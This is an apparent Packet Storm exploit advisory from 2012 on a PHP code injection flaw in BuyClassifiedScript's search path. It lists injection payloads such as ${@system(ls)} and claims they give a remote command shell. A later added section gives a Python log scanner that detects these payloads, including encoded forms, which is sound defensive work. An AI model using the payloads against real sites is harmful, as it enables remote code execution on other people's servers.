BuyClassifiedScript PHP Code Injection

2012-11-25T00:00:00
ID PACKETSTORM:118350
Type packetstorm
Reporter d3b4g
Modified 2012-11-25T00:00:00

Description

                                        
                                            `# Exploit Title: buyclassifiedscript PHP code injection vulnerability  
# Date: 25.11.201  
# Exploit Author: d3b4g  
# Vendor Homepage: http://buyclassifiedscript.com/  
# Tested on: Windows 7  
# Blog: d3b4g.me  
  
  
  
  
----------------------------------------------------------------------------------  
  
This vulnerability allows an attacker to inject custom code  
into the server-side scripting engine. It's possible to get a remote cmd by taking  
advantage of this vulnerability.  
  
  
Vulnerable function:  
  
/search/  
  
  
() PHP code execution:  
  
  
http://localhost/path/search {Inject malicious code}  
  
  
() example of code you can inject:  
  
  
// ${@system(ls)}  
  
${@print(hello)}  
  
$_GET['cmd']  
  
  
//   
  
  
  
-end-  
  
`
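For defenders, the following added example (not part of the original advisory) scans web access logs for requests to the search path that carry the `${@function(...)}` expression syntax shown above, including percent-encoded and double-encoded forms. The log lines, the combined log format and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# PHP expression syntax as shown in the advisory: ${@system(ls)}, ${@print(hello)}
PHP_EXPR = re.compile(r"\$\{\s*@?\s*([A-Za-z_][A-Za-z0-9_]*)\s*\(")
# Request line as written in combined log format: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Nov/2012:10:00:01 +0000] "GET /path/search/%24%7B%40print(hello)%7D HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Nov/2012:10:00:02 +0000] "GET /path/search/used+bicycle HTTP/1.1" 200 2048',
    '203.0.113.5 - - [25/Nov/2012:10:00:03 +0000] "GET /path/search/%2524%257B%2540system(ls)%257D HTTP/1.1" 200 733',
    '198.51.100.9 - - [25/Nov/2012:10:00:04 +0000] "GET /path/about?note=%24%7B%40print(1)%7D HTTP/1.1" 200 90',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_injection_attempts(log_lines, path_prefix="/search"):
    """Return (line_number, function_name) for suspicious search requests."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        request = REQUEST.search(line)
        if not request:
            continue  # not a parsable request line
        target = fully_decode(request.group(1))
        if path_prefix not in target:
            continue  # the advisory names only the search function
        expr = PHP_EXPR.search(target)
        if expr:
            hits.append((number, expr.group(1)))
    return hits

if __name__ == "__main__":
    for number, function in find_injection_attempts(SAMPLE_LOG):
        print(f"line {number}: PHP expression calling {function}() in search request")
```

Hits only show that the payload was sent, not that it executed; correlate them with response sizes and process activity on the web server.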